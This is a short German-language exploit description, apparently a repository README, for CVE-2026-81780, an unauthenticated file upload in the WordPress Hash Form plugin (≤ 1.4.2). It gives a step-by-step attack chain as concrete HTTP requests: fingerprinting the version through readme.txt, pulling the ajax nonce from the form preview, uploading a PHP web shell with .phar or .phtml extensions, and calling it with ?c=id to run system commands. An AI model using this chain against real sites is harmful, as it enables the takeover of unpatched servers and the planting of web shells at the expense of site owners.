
Exploit für CVE-2026-81780: nicht authentifizierter Datei-Upload im WordPress-Hash-Form-Plugin, der über manipulierte PHP-Payloads zu Remote-Code-Ausführung führt.
CVE-2026-81780 — Hash Form RCE
Die Schwachstelle
Unsichere Datei-Uploads im WordPress-Plugin Hash Form (≤ 1.4.2). Das Plugin erlaubt beliebige Datei-Uploads ohne ordnungsgemäße Authentifizierung oder Dateityp-Validierung, was zu Remote Code Execution (RCE) führt.
Exploit-Kette
Schritt Aktion 1 Angreifer prüft das Hash-Form-Plugin über readme.txt 2 Extrahiert ajax_nounce durch Vorschau der Formulare (hashform_preview) 3 Sendet POST-Anfrage an hashform_file_upload_action mit PHP-Payload 4 Lädt Web-Shell als .phar, .phtml, .php5 oder .php7 hoch 5 Löst die Shell aus, indem /wp-content/uploads/hashform/temp/v.{ext} aufgerufen wird 6 Führt Systembefehle über ?c=id aus
GET /wp-content/plugins/hash-form/readme.txt
↓
Version Detected (≤ 1.4.2)
↓
GET /wp-admin/admin-ajax.php?action=hashform_preview&form=1
↓
Extract Nonce: ajax_nounce=...
↓
POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action
↓
Upload: v.phar (or .phtml, .php5, .php7)
↓
GET /wp-content/uploads/hashform/temp/v.phar?c=id
↓
Command Executed (uid=www-data)```